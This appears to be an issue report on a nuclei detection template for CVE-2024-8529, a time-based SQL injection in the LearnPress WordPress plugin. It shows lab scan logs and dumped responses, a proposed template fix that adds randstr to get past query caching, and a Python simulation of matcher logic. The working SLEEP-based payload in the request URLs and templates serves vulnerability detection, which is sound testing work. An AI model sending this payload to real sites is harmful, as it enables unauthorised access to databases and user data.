Template IDs or paths
- http/cves/2024/CVE-2024-8529.yaml
Environment
- OS: Ubuntu 25.04
- Nuclei: 3.7.0
Steps To Reproduce
- VULNERABLE:
nuclei -t CVE-2024-8529.yaml -target http://wordpress-vulnerable:80
- PATCHED:
nuclei -t CVE-2024-8529.yaml -target http://wordpress-patched:80
Relevant dumped responses
root@5bc2ae94136b:/app# nuclei -t templates/CVE-2024-8529.yaml -target http://wordpress-vulnerable:80 -dresp -duc
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.7.0
projectdiscovery.io
[INF] Current nuclei version: v3.7.0 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version: v10.3.5 (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[DBG] [CVE-2024-8529] Dumped HTTP response http://wordpress-vulnerable:80/wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a)
HTTP/1.1 200 OK
Connection: close
Content-Length: 2
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Allow: GET
Content-Type: application/json; charset=UTF-8
Date: Wed, 01 Apr 2026 14:03:38 GMT
Link: <http://localhost:8080/wp-json/>; rel="https://api.w.org/"
Server: Apache/2.4.66 (Debian)
Set-Cookie: lp_session_guest=g-69cd25ba773d5; expires=Fri, 03 Apr 2026 14:03:38 GMT; Max-Age=172800; path=/; HttpOnly
Vary: Origin
X-Content-Type-Options: nosniff
X-Powered-By: PHP/8.3.30
X-Robots-Tag: noindex
X-Wp-Total: 0
X-Wp-Totalpages: 0
[]
[INF] Scan completed in 1.605908144s. No results found.
root@5bc2ae94136b:/app# nuclei -t templates/CVE-2024-8529.yaml -target http://wordpress-patched:80 -dresp -duc
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.7.0
projectdiscovery.io
[INF] Current nuclei version: v3.7.0 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version: v10.3.5 (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[DBG] [CVE-2024-8529] Dumped HTTP response http://wordpress-patched:80/wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a)
HTTP/1.1 200 OK
Connection: close
Content-Length: 2
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Allow: GET
Content-Type: application/json; charset=UTF-8
Date: Wed, 01 Apr 2026 14:03:55 GMT
Link: <http://localhost:8081/wp-json/>; rel="https://api.w.org/"
Server: Apache/2.4.66 (Debian)
Set-Cookie: lp_session_guest=g-69cd25cb50832; expires=Thu, 02 Apr 2026 14:03:55 GMT; Max-Age=86400; path=/; HttpOnly
Vary: Origin
X-Content-Type-Options: nosniff
X-Powered-By: PHP/8.3.30
X-Robots-Tag: noindex
X-Wp-Total: 0
X-Wp-Totalpages: 0
[]
[INF] Scan completed in 1.624597804s. No results found.
root@5bc2ae94136b:/app# tail templates/CVE-2024-8529.yaml
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "contains(content_type, 'application/json')"
          - contains_all(body, 'id\":', 'name\":')
        condition: and
# digest: 4a0a004730450220020262c5fc7e591f4409a1615642c2f1ac0bc8c88e43e191bdffaa88be95434802210082f518e8b3d580faae770be8da773d1f3e8c1f76cf059332ad089f4484d63744:922c64590222798bb761d5b6d8e72950
root@5bc2ae94136b:/app#
Anything else?
Two issues found while testing on LearnPress 4.2.7 (vulnerable) / 4.2.8 (patched):
- Body matchers (contains_all) may cause false negatives — in my implementation the response body is always []. Possible that the author tested on a different version where the body was non-empty, but for blind SQLi a body check is unreliable by design.
- DB query cache (MySQL 5.7 in my case) causes SLEEP() to fire only on the first identical request. Suggest adding {{randstr}} to the payload to bypass the query cache.
```yaml
id: CVE-2024-8529

info:
  name: LearnPress < 4.2.7.1 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can exploit SQL injection through the c_fields parameter to extract sensitive database information including user credentials, course data, and personal information from the LearnPress LMS.
  remediation: |
    Update the LearnPress plugin to version 4.2.7.1 or later.
  reference:
    - https://wpscan.com/vulnerability/6b86c089-177b-45b4-979e-4ae08e586e83/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8529
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-8529
    cwe-id: CWE-89
    epss-score: 0.71031
    epss-percentile: 0.98692
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="wp-content/plugins/learnpress"
    vendor: thimpress
    product: learnpress
  tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev,vuln

http:
  - raw:
      - |
        @timeout: 30s
        GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a)/*{{randstr}}*/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
        condition: and
```
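To make the two false-negative causes above concrete, here is an added example (it is not nuclei's code and not the issue author's) that re-implements the handful of DSL operators these matchers rely on (`duration`, `status_code`, `content_type`, `contains_all`) and runs both matcher sets, the one from the signed template and the one proposed here, over the dumped responses. The responses are reconstructed from the `-dresp` output on this page (200, `application/json`, body `[]`); the durations are constructed assumptions, 6.21 s for the host that honours the delay and 0.04 s for the patched one. A toy `QueryCacheSim` stands in for a database result cache and is likewise constructed, not a real MySQL model.

```python
"""
Added example: evaluates nuclei-style dsl matchers over dumped responses and
models why an unchanged statement only delays on its first run when a query
cache sits in front of the database. All inputs are constructed.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class DumpedResponse:
    """The subset of what nuclei exposes to a dsl matcher that is used here."""
    status_code: int
    content_type: str
    body: str
    duration: float  # seconds, nuclei's `duration` variable


Matcher = Callable[[DumpedResponse], bool]

# Reconstructed from the -dresp dumps on this page; durations are assumptions.
VULNERABLE_DUMP = DumpedResponse(200, "application/json; charset=UTF-8", "[]", 6.21)
PATCHED_DUMP = DumpedResponse(200, "application/json; charset=UTF-8", "[]", 0.04)

BODY_MATCHER = "contains_all(body, 'id\":', 'name\":')"

# Matcher set of the signed template (see the `tail` output above).
ORIGINAL_MATCHERS: Dict[str, Matcher] = {
    "duration>=6": lambda r: r.duration >= 6,
    "contains(content_type, 'application/json')": lambda r: "application/json" in r.content_type,
    BODY_MATCHER: lambda r: all(needle in r.body for needle in ('id":', 'name":')),
}

# Matcher set of the proposed template: timing, status and content type only.
PROPOSED_MATCHERS: Dict[str, Matcher] = {
    "duration >= 6": lambda r: r.duration >= 6,
    "status_code == 200": lambda r: r.status_code == 200,
    'contains(content_type, "application/json")': lambda r: "application/json" in r.content_type,
}


def evaluate(resp: DumpedResponse, matchers: Dict[str, Matcher]) -> Tuple[bool, List[str]]:
    """condition: and -> every matcher must hold. Returns (matched, names that failed)."""
    failed = [name for name, check in matchers.items() if not check(resp)]
    return (not failed, failed)


class QueryCacheSim:
    """Constructed stand-in for a result cache: a statement whose text was seen
    before is answered from cache, so its delay is only observed the first time."""

    def __init__(self, slow_seconds: float = 6.0) -> None:
        self.slow_seconds = slow_seconds
        self._seen: Dict[str, bool] = {}

    def run(self, statement: str) -> float:
        """Simulated wall-clock delay for executing one statement."""
        if statement in self._seen:
            return 0.0
        self._seen[statement] = True
        return self.slow_seconds


def probe_durations(statements: List[str], slow_seconds: float = 6.0) -> List[float]:
    """Run statements in order through one fresh cache and return each delay."""
    cache = QueryCacheSim(slow_seconds)
    return [cache.run(s) for s in statements]


if __name__ == "__main__":
    for host, dump in (("vulnerable", VULNERABLE_DUMP), ("patched", PATCHED_DUMP)):
        for label, matchers in (("original", ORIGINAL_MATCHERS), ("proposed", PROPOSED_MATCHERS)):
            matched, failed = evaluate(dump, matchers)
            print(f"{host:10} {label:8} matched={matched} failed={failed}")
    # Identical statement twice: the second run is served from cache, no delay.
    print(probe_durations(["SLOW_STMT", "SLOW_STMT"]))
    # A per-request comment makes each statement text unique: every run delays.
    print(probe_durations(["SLOW_STMT /*a1b2*/", "SLOW_STMT /*c3d4*/"]))
```

Running it shows the original matcher set failing on the vulnerable host solely because of `contains_all(body, ...)` even though the 6 s delay was observed, the proposed set matching the vulnerable host and rejecting the patched one on `duration >= 6`, and the cache simulation returning `[6.0, 0.0]` for a repeated statement versus `[6.0, 6.0]` once each request carries a unique comment, which is the effect `{{randstr}}` is meant to produce.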